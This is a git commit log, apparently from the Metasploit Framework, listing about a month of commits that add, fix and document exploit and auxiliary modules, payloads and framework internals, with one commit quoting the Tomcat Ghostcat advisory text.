h00die 92a9d50ea9 add joomla component update script 2020-11-21 12:36:21 -05:00
h00die e2e086ba6f mention joomla 2020-11-21 11:56:33 -05:00
h00die 15b5a811e4 update check external scripts and wordpress files 2020-11-21 11:52:18 -05:00
h00die f4c67d713b adjust version number 2020-11-21 10:39:03 -05:00
h00die b023adfdcd wordpress email and subscription newsletter sqli 2020-11-21 10:31:55 -05:00
h00die 149e30d81a wordpress email and subscription newsletter sqli 2020-11-21 10:30:15 -05:00
Brendan Coles 27f0cf341f Line wrap Metasploit tips at 60 columns 2020-11-21 14:26:38 +00:00
h00die 92c92f1573 simple file list rce 2020-11-21 08:51:07 -05:00
bwatters 810898e97b Rough attempt at CVE-2020-1337
Non-functional
2020-11-20 17:36:19 -06:00
Spencer McIntyre 6bdc7a11a3 Tweak the Python single payload descriptions 2020-11-20 16:33:35 -05:00
Tim W 634a2f3c61 prevent upgrading of meterpreter sessions with shell_to_meterpreter 2020-11-20 17:26:21 +00:00
Jeffrey Martin d99db6ac0e refactor test for ruby 2.7 deprecations
addresses `warning: deprecated Object#=~ is called on Array; it always returns nil`
2020-11-20 10:59:04 -06:00
cgranleese-r7 2be68ec3b2 Correction
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2020-11-20 16:14:42 +00:00
cgranleese-r7 0397e7770e Changes to code flow
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2020-11-20 15:37:18 +00:00
cgranleese-r7 0fa714e31b Removes whitespaces from returned version output 2020-11-20 15:13:32 +00:00
Metasploit 025950ec0b automatic module_metadata_base.json update 2020-11-20 07:57:20 -06:00
Spencer McIntyre 1031b12c57 Land #14206, Rockwell FactoryTalk CVE-2020-12027 RCE 2020-11-20 08:49:39 -05:00
cgranleese-r7 cba92f6459 Fixes ssh_login gather proof issue when user has low privileges 2020-11-20 13:06:17 +00:00
A Galway 5e4e52c619 convert strings to bytes and mandate python3 2020-11-20 12:57:36 +00:00
Spencer McIntyre cbc5899edf Add module docs for the Service Permissions LPE module 2020-11-19 14:17:20 -05:00
Metasploit 9a2668729e Bump version of framework to 6.0.18 2020-11-19 11:57:09 -06:00
Spencer McIntyre 9368f4bdf3 Apply rubocop suggestions to the service permissions module 2020-11-19 12:54:16 -05:00
Spencer McIntyre d1faea5bb7 Add a TargetServiceName option and adjust exception handling 2020-11-19 12:54:16 -05:00
Spencer McIntyre 205a9db8cf Add the initial registry technique for the service permissions LPE 2020-11-19 12:54:10 -05:00
Spencer McIntyre 94e016e5de Land #14408, Bump RubySMB to version 2.0.7 2020-11-19 12:45:55 -05:00
Christophe De La Fuente 4837cbc07c Bump RubySMB to version 2.0.7 2020-11-19 18:36:24 +01:00
Spencer McIntyre a5024238d3 Tweak the check method to return detected and fix a typo 2020-11-19 09:24:27 -05:00
Metasploit 83283778d3 automatic module_metadata_base.json update 2020-11-19 08:16:47 -06:00
adfoster-r7 2eb2fad212 Land #14294, Allow adding details to CheckCodes, and update ms17_010_eternalblue to validate the target is x64 2020-11-19 14:09:55 +00:00
Pedro Ribeiro b56d2e00fe Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-19 19:39:59 +07:00
Pedro Ribeiro c635538e9d Update modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-11-19 19:39:47 +07:00
Pedro Ribeiro 4c8adcfd46 Update rockwell_factorytalk_rce.rb 2020-11-19 17:56:31 +07:00
Pedro Ribeiro e7196256d4 Update rockwell_factorytalk_rce.md 2020-11-19 17:53:25 +07:00
SunCSR Team a87bc32a5c Update tomcat_ghostcat.rb 2020-11-19 14:06:05 +07:00
SunCSR Team 803f3c7bf7 Update tomcat_ghostcat.rb 2020-11-19 09:27:05 +07:00
Metasploit feac808ef1 automatic module_metadata_base.json update 2020-11-18 16:02:33 -06:00
William Vu d3f16c7061 Land #14361, COOKIE for sharepoint_ssi_viewstate 2020-11-18 15:55:19 -06:00
Metasploit d8d5ae7335 automatic module_metadata_base.json update 2020-11-18 15:46:12 -06:00
Spencer McIntyre 13706ccdda Land #14324, Add Oracle WebLogic Server Administration Console Handle RCE (CVE-2020-14882 and CVE-2020-14883?) 2020-11-18 16:39:18 -05:00
William Vu dcd8ec1d70 Lock JDK to 8u131 to be safe 2020-11-18 15:17:12 -06:00
William Vu 20a90557bf Update module doc 2020-11-18 15:08:12 -06:00
William Vu bcdf5aa586 Clarify Windows target setup further 2020-11-18 14:25:10 -06:00
William Vu 4d610b5500 Clarify using the generic installer for examples 2020-11-18 14:06:13 -06:00
William Vu 72a6993408 Add patch bypass (CVE-2020-14750) to references
We were already using it... but now there's a CVE.
2020-11-18 10:57:05 -06:00
William Vu 78999bb92c Add an exploit from Exploit-DB
Written by either (Nguyen) Jang or Mohammed Althibyani. Not used by the
module.

https://www.exploit-db.com/exploits/48971
2020-11-18 10:56:03 -06:00
William Vu 5aef7cf5b6 Fix hang in cmd/windows/powershell_reverse_tcp
Won't show a prompt if initial_output is nil.
2020-11-18 10:56:03 -06:00
William Vu 83beae731f Add WebLogic Administration Console Handle RCE
CVE-2020-14882
CVE-2020-14883
2020-11-18 10:56:02 -06:00
adfoster-r7 cc1c5feea4 Merge pull request #14395 from dwelch-r7/stale-bot-weekdays-only
Limit stalebot to weekdays
2020-11-18 16:30:14 +00:00
Metasploit d2b2b79425 automatic module_metadata_base.json update 2020-11-18 10:18:06 -06:00
dwelch-r7 c7b5616319 Land #14341, Fix NIL Dereference Issues
Fix NIL Dereference Issues, Missing fail_with Statements, and Update Regex Inside SecureCRT Password Gatherer
2020-11-18 16:17:25 +00:00
Grant Willcox d96f257842 Fix up mistake where I thought .to_s on an empty string would return an empty string 2020-11-18 09:54:50 -06:00
Tim W fd3f64ed0a fix encoding and comspec in shell_to_meterpreter 2020-11-18 22:46:09 +08:00
dwelch-r7 b95ddf1d89 Land #14402, Remove unused payload compatibility code
Remove unused payload compatibility code
2020-11-18 14:11:03 +00:00
realmatthours 4f7329d93d Remove EOL spaces from consul_service_exec.rb 2020-11-18 09:09:55 +00:00
Grant Willcox ef108eae4c Add in Dean's suggested fix to make the check a little neater 2020-11-17 10:02:02 -06:00
Adam Cammack e8dfffdcc0 Remove unused payload compatibility code
This original version of the convention checker has not been used in
quite some time, now all of that is covered in
lib/msf/core/module/compatibility.rb
2020-11-17 10:01:43 -06:00
realmatthours 6f1365b75d Add Windows support to consul_service_exec.rb
Added Windows to the 'Targets' list with CmdStagerFlavor psh_invokewebrequest. Generalised the payload delivery to allow for both Windows and the existing Linux payloads.
2020-11-17 15:37:55 +00:00
Tim W 14048fc4f5 fix shell_reverse_udp payload cached size 2020-11-17 18:30:24 +08:00
Tim W b4b2ae44c1 add heredoc awareness to msftidy 2020-11-17 18:06:17 +08:00
Tim W 9613897294 fix python/shell_reverse_udp 2020-11-17 17:33:43 +08:00
dwelch-r7 f910d64f4d Land #14393, guard persist on handler existence
guard persist on handler existence
2020-11-17 09:06:24 +00:00
Spencer McIntyre efa125bb23 Document the synchronization procedure 2020-11-16 16:13:35 -05:00
Spencer McIntyre 3586644b62 Increase the payload space to 4096 within the DLL template 2020-11-16 15:58:59 -05:00
Spencer McIntyre 2d367b867d Add a synchronization primitive to the DLL template 2020-11-16 15:57:27 -05:00
Metasploit 48e8769c4e automatic module_metadata_base.json update 2020-11-16 12:53:47 -06:00
William Vu f73a88a39c Land #14396, hadoop_unauth_exec clarification 2020-11-16 12:44:13 -06:00
Tod Beardsley 0feff932f2 Change docs to reflect the truth of the "vuln" 2020-11-16 11:38:00 -06:00
Tod Beardsley 06a0634828 Describe the Hadoop vuln as not-a-vuln clearly 2020-11-16 11:31:59 -06:00
SunCSR Team 441c61190b Update tomcat_ghostcat.rb 2020-11-17 00:00:32 +07:00
Spencer McIntyre c6304704f4 Cleanup inconsistent whitespace in the DLL template 2020-11-16 11:26:15 -05:00
SunCSR Team 41aae4224f Update tomcat_ghostcat.rb 2020-11-16 22:25:41 +07:00
SunCSR Team 2d99a07b12 Update and rename documentation/modules/exploit/windows/http/tomcat_ghostcat.md to documentation/modules/auxiliary/admin/http/tomcat_ghostcat.md 2020-11-16 21:03:00 +07:00
SunCSR Team 7d860bb623 Rename modules/exploits/windows/http/tomcat_ghostcat.rb to modules/auxiliary/admin/http/tomcat_ghostcat.rb 2020-11-16 20:57:13 +07:00
A Galway 90ea63c1e2 Land #14219, adds . char to Brocade hash checks 2020-11-16 12:56:18 +00:00
dwelch-r7 93685407f6 Limit stalebot to weekdays 2020-11-16 11:38:49 +00:00
SunCSR Team 460d7775db Update tomcat_ghostcat.rb 2020-11-16 16:27:27 +07:00
SunCSR Team 1bd6b75394 Create tomcat_ghostcat.md 2020-11-16 15:08:14 +07:00
SunCSR Team c7f6188c70 Delete tomcat_ghostcat.md 2020-11-16 15:06:28 +07:00
SunCSR Team 3b95835f5e Rename apache_tomcat_ghostcat.md to tomcat_ghostcat.md 2020-11-16 14:56:33 +07:00
SunCSR Team cc1d335251 Add apache_tomcat_ghostcat.md 2020-11-16 14:44:49 +07:00
SunCSR Team 95af5a6f7e Add Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion
When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.
2020-11-16 14:08:38 +07:00
Jeffrey Martin 49fac19692 guard persist on handler existence
Short term fix to only persist jobs with handlers. More work should
be done to improve job persistence to allow more jobs types to persist.
2020-11-13 17:08:10 -06:00
Grant Willcox dab01ea179 Add in fixes to use string capture group functionality and also improve the regex so that we get extra info such as port numbers and protocol info from logins other than SSH 2020-11-13 14:14:45 -06:00
Spencer McIntyre 83b9014bd4 Switch the signature to use an optional details 2020-11-13 14:09:14 -05:00
Spencer McIntyre c717a65ec3 Align the help output of the meterpreter reg command 2020-11-13 11:30:01 -05:00
Metasploit 68416ee267 automatic module_metadata_base.json update 2020-11-13 08:51:36 -06:00
A Galway 0328e3f815 Land #14359, gives preference to default target options 2020-11-13 14:44:13 +00:00
Metasploit 13851bb0c9 automatic module_metadata_base.json update 2020-11-13 06:05:48 -06:00
Christophe De La Fuente d6b412c58e Land #14340, Add HorizontCMS 1.0.0-beta exploit module and documentation 2020-11-13 13:03:04 +01:00
adfoster-r7 6aa2efca13 Land #14381, Fixes rhost_http_url crashes when running the check method 2020-11-13 09:51:33 +00:00
Metasploit 8cb51e1fbd Bump version of framework to 6.0.17 2020-11-12 12:00:35 -06:00
cgranleese-r7 7599bd4964 Adds tests for valid? method 2020-11-12 17:20:49 +00:00
A Galway 04398b5718 Land #14373, removes unused NetwareConsole class 2020-11-12 16:20:15 +00:00
Metasploit 1af280114f automatic module_metadata_base.json update 2020-11-12 09:59:24 -06:00
dwelch-r7 f801744da5 Land #14378, Synchronize access to job status tracker
Synchronize access to job status tracker
2020-11-12 15:49:41 +00:00
A Galway 4114dc596c Land #14387, ensures AutoCheck is always prepended 2020-11-12 15:44:34 +00:00
A Galway a890210bfc Land #14372, Fix executable bit on msfdb 2020-11-12 15:18:20 +00:00
adfoster-r7 6a4a944553 Land #14384, Update usage of Timecop to a more explicit parameter set as 12:00 to account for timezone shifts. 2020-11-12 13:07:53 +00:00
h00die 020e90543d IOS -> IOC 2020-11-11 17:43:16 -05:00
h00die 6880376c61 add reliability, stability, side effects to pulse_secure_gzip_rce 2020-11-11 17:19:10 -05:00
Metasploit 3f29fd6cac automatic module_metadata_base.json update 2020-11-11 16:18:29 -06:00
Alan Foster 79a3328cd3 Validate that AutoCheck is prepended 2020-11-11 22:15:40 +00:00
William Vu fb93d45a44 Land #14386, saltstack_salt_api_cmd_exec fixes 2020-11-11 16:09:37 -06:00
William Vu fcb507e412 Fix AutoCheck
I'm a big dummy.
2020-11-11 15:57:38 -06:00
William Vu 04bcbd0253 Update module doc 2020-11-11 15:57:29 -06:00
Metasploit 5171ff1a58 automatic module_metadata_base.json update 2020-11-11 13:52:11 -06:00
Spencer McIntyre ef6bf3500a Land #14379, Add SaltStack Salt REST API RCE (CVE-2020-16846 and CVE-2020-25592) 2020-11-11 14:44:53 -05:00
William Vu 42bdae919b Add SaltStack Salt REST API RCE (CVE-2020-16846)
Leveraging CVE-2020-25592.
2020-11-11 13:09:26 -06:00
William Vu 67ae309896 Set plat/arch in saltstack_salt_unauth_rce targets
Looks like I forgot this, and it affects compatible payloads.
2020-11-11 13:09:26 -06:00
h00die 98b222fa48 fix permissions 2020-11-11 13:42:41 -05:00
Jeffrey Martin 5a6a530623 use more explicit date set in Timecop 2020-11-11 12:41:05 -06:00
h00die 1b0529bc96 ignore loading external modules that start with example 2020-11-11 10:56:07 -05:00
Grant Willcox d737299fa9 Land #14362, Bump metasploit-payloads gem to 2.0.23 2020-11-11 09:31:48 -06:00
h00die d3b67069c8 add cmd stager example py exploit 2020-11-11 10:27:53 -05:00
h00die 35d6a9f315 add example python module to repo 2020-11-11 10:11:08 -05:00
Metasploit 7bbbdd5f08 automatic module_metadata_base.json update 2020-11-11 08:33:45 -06:00
Spencer McIntyre de4d8c0f93 Land #14382, update apply_pot to the hashcat generation 2020-11-11 09:26:19 -05:00
Spencer McIntyre cbc34d7cbc Tweak the logic for detecting if john is the jumbo version 2020-11-11 09:25:52 -05:00
h00die 4f37e65069 update apply_pot to the hashcat generation 2020-11-11 09:38:02 -05:00
kalba-security ce7031e263 Add suggestions from code review 2020-11-11 07:41:22 -05:00
cgranleese-r7 6ab1f951d6 Fixes rhost_http_url crashes when running the check method 2020-11-11 10:58:22 +00:00
Alan Foster 893707a352 Synchronize access to job status tracker 2020-11-10 19:50:17 +00:00
Niboucha Redouane e23caaf5eb fix parameter names, small formatting issue 2020-11-10 19:07:32 +01:00
Metasploit 1fb7824ab6 automatic module_metadata_base.json update 2020-11-10 10:23:02 -06:00
Brendan Coles a53d86c78f Land #14375, Remove vague CWE references from two exploit modules
* exploit/multi/http/cmsms_object_injection_rce
* exploit/unix/local/chkrootkit
2020-11-10 16:12:13 +00:00
h00die 4c39695a50 remove cwe-20 from chkrootkit 2020-11-10 12:01:08 -05:00
h00die 768fb7d3a7 remove cwe-74 from cmsms 2020-11-10 11:43:42 -05:00
Grant Willcox be56d49198 Land #14370, Fix tab completion crash within several msfconsole commands when no results are returned. 2020-11-10 09:55:21 -06:00
Metasploit c30486d424 automatic module_metadata_base.json update 2020-11-10 09:03:25 -06:00
Spencer McIntyre 76ab0ee849 Land #14304, execute_dotnet_assembly fix parameters management 2020-11-10 09:56:18 -05:00
Shelby Pace 65e1ef4cb8 Land #14253, add wp-file-manager rce for wordpress 2020-11-10 08:48:33 -06:00
Shelby Pace 4382f6ff55 add filedropper usage 2020-11-10 08:47:53 -06:00
Metasploit 867b2be20a automatic module_metadata_base.json update 2020-11-10 07:01:37 -06:00
dwelch-r7 cd9b5425e8 Remove unused netware console session 2020-11-10 12:57:28 +00:00
adfoster-r7 a169e01aff Land #14371, Add version details to drupal_views_user_enum.rb 2020-11-10 12:55:03 +00:00
Quentin Kaiser 26f39b5819 Checks if Pulse Secure Connect client is actually installed. Raise an exception if it's not. 2020-11-10 13:54:22 +01:00
Alan Foster d74e8f7ad9 Fix executable bit on msfdb 2020-11-10 12:29:14 +00:00
Metasploit 988e30dfb1 automatic module_metadata_base.json update 2020-11-10 03:46:41 -06:00
Tim W e14813485a Land #14331, add msfvenom apk template cmd injection exploit 2020-11-10 17:33:10 +08:00
h00die b0b9ace606 Revert "remove ruby pulse_secure_cmd_exec"
This reverts commit efb8557e43.
2020-11-09 20:09:12 -05:00
h00die 8b9043c3f3 add drupal views version info 2020-11-09 16:03:23 -05:00
Metasploit ebd83d7adc automatic module_metadata_base.json update 2020-11-09 14:19:23 -06:00
adfoster-r7 a0106aa603 Land #14269, Add Apache Zookeeper Information Disclosure Auxiliary Module 2020-11-09 20:12:35 +00:00
Grant Willcox 59d5ba3dd2 Update module cache size since apparently the local tool thought the loadlibrary cache sizes had changed even though they didn't (which makes sense since no updates were made to these files) 2020-11-09 13:21:57 -06:00
Grant Willcox 34697ecc11 Apply further fixes from the review process 2020-11-09 12:11:25 -06:00
Spencer McIntyre 0ccb50ac02 Adjust how HostingCLR arguments are packed 2020-11-09 12:24:55 -05:00
adfoster-r7 3d9e3fd66c Land #14363, smb_login - use the constants for the object comparison of NTStatus codes 2020-11-09 16:12:50 +00:00
Quentin Kaiser 8eeca7cafd Fix rdoc. 2020-11-09 16:33:16 +01:00
Quentin Kaiser f2f360ff5f msftidy run 2020-11-09 16:27:19 +01:00
Quentin Kaiser 68e3f6a146 Refactor run function, makes build information easier to understand by using print_good and print_warning. 2020-11-09 16:25:06 +01:00
Quentin Kaiser a17434050c Document each function for easier review. 2020-11-09 16:21:08 +01:00
Quentin Kaiser c62a6716c5 Remove spaces at EOL. 2020-11-09 15:46:13 +01:00
cgranleese-r7 a052611097 Moves fix to a better location 2020-11-09 14:29:35 +00:00
cgranleese-r7 b9668db089 Fixes generate commands tab completion crash 2020-11-09 12:07:46 +00:00
stasinopoulos 2ee9b47023 Minor update regrarding Options section 2020-11-09 08:59:14 +02:00
stasinopoulos 2d81187b3c Update regarding OMV version identification 2020-11-09 08:58:05 +02:00
h00die da70b74954 fix version numbers 2020-11-08 22:38:53 -05:00
h00die 3c4962e9b0 working and clean 2020-11-08 22:31:26 -05:00
h00die 9f936038e5 cleanup rnd1 2020-11-08 08:42:19 -05:00
h00die 0e62e7793d working session on linux/x86/shell/reverse_tcp 2020-11-08 08:27:55 -05:00
Pedro Ribeiro e33f4ea63e Merge pull request #24 from rapid7/master
aaaa
2020-11-08 17:21:06 +07:00
stasinopoulos fc2e9f7c89 Minor update after rubocop run 2020-11-08 10:27:59 +02:00
stasinopoulos ad5b0af9c6 Fixes n' updates 2020-11-08 10:26:31 +02:00
Imran E. Dawoodjee 13fc16eb07 Merge pull request #1 from space-r7/pr-14253
add AutoCheck usage, minor changes
2020-11-07 12:48:43 +08:00
chmod750 5ec0556abd Update modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
CamelCase update

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
2020-11-06 23:26:40 +01:00
chmod750 7a968fcd39 Update modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
CamelCase update

Co-authored-by: wvu-r7 <wvu-r7@users.noreply.github.com>
2020-11-06 23:20:12 +01:00
Spencer McIntyre 06b16106b4 Use the constants for the object comparison of NTStatus codes
Fixes #14354
2020-11-06 16:34:23 -05:00
Grant Willcox f032f98860 Woops Gem version should be 2.0.23 and we need to update the cached sizes as well 2020-11-06 15:23:53 -06:00
Grant Willcox 0b6bf4ec11 Bump metasploit-payloads gem to 2.0.24 2020-11-06 10:03:48 -06:00
Quentin Kaiser d8f5dc5143 IVE definitions are shared by every user running on the same host. I fixed the data structure to reflect that. 2020-11-06 16:53:02 +01:00
chmod750 22b0fae73c Update sharepoint_ssi_viewstate.rb 2020-11-06 16:40:16 +01:00
chmod750 8356b44892 Add cookie header functionnality 2020-11-06 16:16:59 +01:00
Quentin Kaiser 05fa4b235d Fix vulnerable builds range. Finally supports DPAPI decryption as elevated user. Lots of cleanup to do. 2020-11-06 16:00:48 +01:00
Tim W 552cd5a2fc python code golf and convert to squiggly heredoc 2020-11-06 14:16:07 +08:00
Tim 856239f2a8 Apply code golf suggestions from acammack
Co-authored-by: acammack-r7 <adam_cammack@rapid7.com>
2020-11-06 12:41:36 +08:00
Jared Stroud e7e8765473 removing spaces EOL 2020-11-05 20:54:04 -05:00
Grant Willcox 598475b147 Land #14353, Improve msfdb UX 2020-11-05 18:54:00 -06:00
Alan Foster 5b438fd933 Preference target values when registering options 2020-11-05 23:16:37 +00:00
Metasploit 54b893aa4d Bump version of framework to 6.0.16 2020-11-05 11:59:10 -06:00
Grant Willcox e0209b34c6 Apply initial fixes from Adam's review 2020-11-05 11:53:38 -06:00
A Galway 0aead044e3 cleans up logging for multiple component commands 2020-11-05 16:21:03 +00:00
Grant Willcox 17fb85c670 Land #14350, Add nasm dependancy to docker file to make nasm_shell.rb work 2020-11-05 10:12:21 -06:00
Metasploit 691a9b89e9 automatic module_metadata_base.json update 2020-11-05 09:15:17 -06:00
Grant Willcox 5761fe9307 Land #14349, Fix merge mistake in PR 14222 2020-11-05 09:07:51 -06:00
Metasploit a4f6f08364 automatic module_metadata_base.json update 2020-11-05 08:43:56 -06:00
Christophe De La Fuente 55ccc42cde Land #14319, wp_Loginizer unauth sqli (CVE-2020-27615) 2020-11-05 15:36:10 +01:00
Quentin Kaiser ca3055a009 Proper version checks. Comment on future work regarding data left in registy by previous version and dumping when in elevated mode. 2020-11-05 13:28:42 +01:00
kalba-security 31237258e5 Add Rubocop changes 2020-11-05 07:27:51 -05:00
kalba-security e7a20ec47c Add CVE ID to module and docs 2020-11-05 07:05:32 -05:00
kalba-security 0a9589166f Add CVE ID 2020-11-05 06:55:37 -05:00
Quentin Kaiser a800536df2 For some reason, the first profile will be stored in connstore.dat while subsequent ones will be stored in connstore.tmp. Note that even if it ends with '.tmp', this file is not temporary. This commit provides support for deployments with multiple VPN connections. 2020-11-05 12:41:38 +01:00
Tim W 65d1cc568e update compatibility in description 2020-11-05 18:19:05 +08:00
Justin Steven 34715de016 Add jdk to msfvenom's APK template dependencies 2020-11-05 20:13:52 +10:00
Tim W 06d109d2c5 update payload cached sizes 2020-11-05 18:11:14 +08:00
Tim W 766fbd98aa fix python/shell_bind_tcp on python3 2020-11-05 18:07:28 +08:00
Metasploit c4578b0087 automatic module_metadata_base.json update 2020-11-05 03:34:41 -06:00
cgranleese-r7 70985a09e2 Merge pull request #14280 from h00die/mikrofileread
Land #14280, Mikrotik unauthenticated directory traversal file read
2020-11-05 09:27:47 +00:00
h00die f39e4d62e2 working but needs cleanup 2020-11-04 17:59:04 -05:00
Karn Ganeshen 55daaecc7b doc updated 2020-11-05 04:06:53 +05:30
Karn Ganeshen f9a12e6e80 Module updated
Improved handling of response exceptions
2020-11-05 04:03:05 +05:30
Matúš Bursa cbd1f65bd7 added nasm to make nasm_shell.rb working 2020-11-04 21:42:34 +01:00
Grant Willcox a0087842fb Fix an earlier merge mistake, was meant to replace URI.escape with Rex::Text.uri_encode() but instead replaced it with CGI.escape. Fix it to be Rex::Text.uri_encode() 2020-11-04 14:39:16 -06:00
Metasploit 6f75fc77e6 automatic module_metadata_base.json update 2020-11-04 14:12:56 -06:00
Grant Willcox d50ac2972d Land #14222, Update php_fpm_rce.rb to replace depreciated URI.encode calls with Rex::Text::uri_encode 2020-11-04 14:04:28 -06:00
h00die 37b454ce1e chmod +x 2020-11-04 14:18:34 -05:00
h00die bacc0f78ed permissions solved 2020-11-04 14:17:16 -05:00
h00die dff6a21742 add wp version check 2020-11-04 11:45:06 -05:00
Shelby Pace 79e83cdceb add rubocop change 2020-11-04 10:09:00 -06:00
Shelby Pace e49d99a80d add AutoCheck usage, minor changes 2020-11-04 10:04:14 -06:00
adfoster-r7 641ae93731 Land #14270, add additional logging for invalid/missing encoders when running multiple encode payload 2020-11-04 14:55:12 +00:00
kalba-security ea70c15b56 Implement suggestions from code review 2020-11-04 09:49:27 -05:00
h00die 8a936a07f0 stuck in read only mode 2020-11-03 18:33:40 -05:00
Grant Willcox 84af718ad9 Fix up the fail_with statements as I used the wrong error codes on them 2020-11-03 15:20:59 -06:00
Grant Willcox e0a9cbbd8d Fix up several null pointer dereference issues as well as some other locations where we should have called fail_with to properly terminate the program and raise the appropriate messages and status codes 2020-11-03 14:51:45 -06:00
h00die 1e0ea16173 runs, needs cleanup 2020-11-03 15:25:49 -05:00
kalba-security 8aceea1872 Add flexdotnetcms_upload_exec module and docs 2020-11-03 09:50:28 -05:00
Romain Lesteven 5132882c58 Ref #14333 : Fix Linux_BindTcp Payload 2020-11-03 13:11:32 +01:00
Romain Lesteven 3f0030b16e Ref #14336 : Fix Windows reverse_named_pipe Payload 2020-11-03 13:04:36 +01:00
Romain Lesteven 1977419932 Ref #14336 : Fix Windows PingBack_Reverse_TCP Payload 2020-11-03 13:03:29 +01:00
Metasploit 5fbe243662 automatic module_metadata_base.json update 2020-11-02 18:38:07 -06:00
bwatters 8add7fb7ca Land #14335, Remove the DRuby remote code execution module
Merge branch 'land-14335' into upstream-master
2020-11-02 18:30:54 -06:00
Metasploit 4ef8135af8 automatic module_metadata_base.json update 2020-11-02 16:53:23 -06:00
Grant Willcox 8a82907a0f Land #14323, Use the datastore nameservers when the NS option is set in enum_dns.rb for zone transfers 2020-11-02 16:44:19 -06:00
Metasploit 09ef917986 automatic module_metadata_base.json update 2020-11-02 15:06:45 -06:00
Spencer McIntyre 708de57499 Land #14297, Modified zabbix login to work with newer versions of zabbix 2020-11-02 15:59:22 -05:00
Metasploit e80da70fc4 automatic module_metadata_base.json update 2020-11-02 14:45:59 -06:00
Grant Willcox 7b72120016 Land #14252, Update Avira password gatherer module and associated libaries and add in documentation 2020-11-02 14:37:47 -06:00
Grant Willcox a4da8cc135 Land #14326, Fix store_loot bug 2020-11-02 12:02:05 -06:00
kalba-security cf954888da Add horizontcms_upload_exec module and documentation 2020-11-02 13:01:13 -05:00
Metasploit 3543aaa9ac automatic module_metadata_base.json update 2020-11-02 08:57:54 -06:00
Christophe De La Fuente 037525b313 Land #14329, Fix smb version error handling 2020-11-02 15:49:46 +01:00
Spencer McIntyre 659137da94 Remove the DRuby remote code execution module 2020-11-02 08:32:52 -05:00
h00die efb8557e43 remove ruby pulse_secure_cmd_exec 2020-11-01 14:46:46 -05:00
Justin Steven 61f7f01f37 Nicer certificate expiration
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-31 12:14:18 +10:00
Justin Steven cb14287cb2 Add metasploit_msfvenom_apk_template_cmd_injection 2020-10-31 11:28:28 +10:00
Grant Willcox c62001c210 Improve the zabbix session gathering code as per Spencer's recommendation and update the spec checks accordingly 2020-10-30 14:14:14 -05:00
Spencer McIntyre a1561cff46 Add some additional error handling with more readable messages 2020-10-30 14:34:44 -04:00
Grant Willcox 0e312dbb79 Update the description of the Raw-MD5u format a bit more to give some context to it all 2020-10-30 12:56:18 -05:00
Grant Willcox 46c937089d Fix up regex to properly match on Raw-MD5u only, and fix up refname to be self.refname to fit in with other modules in this directory 2020-10-30 12:37:35 -05:00
cgranleese-r7 aecc15c776 Fix for store_loot bug 2020-10-30 16:51:18 +00:00
Alan Foster 17ac8dab2a Fix smb version error handling 2020-10-30 16:26:31 +00:00
h00die 6944e67f5c add missing docs 2020-10-30 11:36:28 -04:00
Spencer McIntyre 06d1165a8b Remove dead code in the auxiliary/gather/enum_dns option 2020-10-30 10:45:08 -04:00
Spencer McIntyre 17df870e74 Show the current NS server IP address when doing a transfer 2020-10-30 10:28:14 -04:00
Tim W 41d984e6cc fix #14207, fix python/shell_reverse_tcp on python3 2020-10-30 17:42:57 +08:00
Grant Willcox 4479f4f0e1 Update library and module to fully support version 5.2. Also update the module to support guest discovery on newer versions on Zabbix 2020-10-29 19:27:12 -05:00
Spencer McIntyre a312688391 Use the datastore nameservers when doing zone transfers when set 2020-10-29 17:52:18 -04:00
b4rtik ddd9af83b9 Update 2020-10-29 22:49:41 +01:00
Grant Willcox 6ce64e802b Land #14282, More descript error logging for extrnal modules 2020-10-29 16:16:56 -05:00
h00die 238889282a module cleanup 2020-10-29 17:11:19 -04:00
h00die c4e74c2ed0 wip chopslider 2020-10-29 15:33:37 -04:00
Metasploit 99ac92310a Bump version of framework to 6.0.15 2020-10-29 12:00:21 -05:00
h00die f94acb94c9 cleanup 2020-10-29 10:46:14 -04:00
adfoster-r7 f988018522 Land #14312, Update debug command connection name logging 2020-10-29 13:21:34 +00:00
dwelch-r7 c51e5b1021 Land #14225, rescue SSLError in HTTP scanner check_setup
rescue SSLError in HTTP scanner check_setup
2020-10-29 13:06:06 +00:00
C4ssandre 33fa947c72 Improving syntax and code style. 2020-10-28 22:48:01 +00:00
C4ssandre 7364758017 Implementing AutoCheck mixin. 2020-10-28 22:43:08 +00:00
C4ssandre ad74428f6b Change in order to make sure we get the right notepad executed. Change in response to https://github.com/rapid7/metasploit-framework/pull/14046#pullrequestreview-481887070 2020-10-28 21:55:12 +00:00
h00die 220b7ac922 add sqlmap directions 2020-10-28 15:50:08 -04:00
C4ssandre b36f06178a Fixing some syntax errors. 2020-10-28 18:50:00 +00:00
Che5hireC4t e4272e3c88 Adding metadata to ruby module. 2020-10-28 19:02:15 +01:00
Che5hireC4t 996f58da26 Adding a documentation file. 2020-10-28 18:54:38 +01:00
Metasploit 854c1905ca automatic module_metadata_base.json update 2020-10-28 12:43:45 -05:00
Spencer McIntyre 861879275e Land #14250, Fix how DNS enumeration displays AXFR results 2020-10-28 13:38:38 -04:00
